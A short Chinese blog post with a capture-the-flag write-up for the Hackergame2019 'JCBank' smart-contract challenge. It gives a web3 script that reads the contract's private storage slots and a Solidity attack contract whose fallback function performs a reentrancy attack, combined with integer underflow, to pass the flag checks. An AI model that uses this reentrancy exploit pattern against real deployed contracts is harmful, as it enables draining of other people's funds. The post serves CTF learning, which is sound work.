Fork me on GitHub
pikachu's Blog

Hackergame2019 JCBank

前言

1
2
3
4
5
6
7
8
9
10
11
var Web3=require("web3");
if (typeof web3 !== 'undefined') {
web3 = new Web3(web3.currentProvider);
} else {
web3 = new Web3(new Web3.providers.HttpProvider("https://kovan.infura.io/v3/b38f10b5036f4e6691fcc690461097d1"));
}

var address="0xE575c9abD35Fa94F1949f7d559056bB66FddEB51";
web3.eth.getStorageAt(address, 0, function(x,y){console.info(y)});
web3.eth.getStorageAt(address, 1, function(x,y){console.info(y)});
web3.eth.getStorageAt(address, 2, function(x,y){console.info(y)});
  • get_flag_2 利用 Reentrancy整型下溢
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
contract hack {
address instance_address = 0xE575c9abD35Fa94F1949f7d559056bB66FddEB51;
JCBank target = JCBank(instance_address);
uint public have_withdraw = 0;
string public s;

constructor() public payable {}

function attack() public {
target.deposit.value(0.1 ether)();
}

function attack1(uint128 guess) public {
s=target.get_flag_1(guess);
}

function attack2() public {
if(have_withdraw == 1){
target.get_flag_2(155418233698);
}
}

function attack3() public {
target.withdraw(0.1 ether);
}

function() payable {
if (have_withdraw == 0 && msg.sender == instance_address){
have_withdraw = 1;
target.withdraw(0.1 ether);
}
}
}
  • attack 存入一点金额,attack3 重入攻击两次, attack2 调用 get_flag_2 即可
---------------- The End ----------------
谢谢大爷~

Author:pikachu
Link:https://hitcxy.com/2019/JCBank/
Contact:hitcxy@hotmail.com
本文基于 知识共享署名-相同方式共享 4.0 国际许可协议发布
转载请注明出处,谢谢!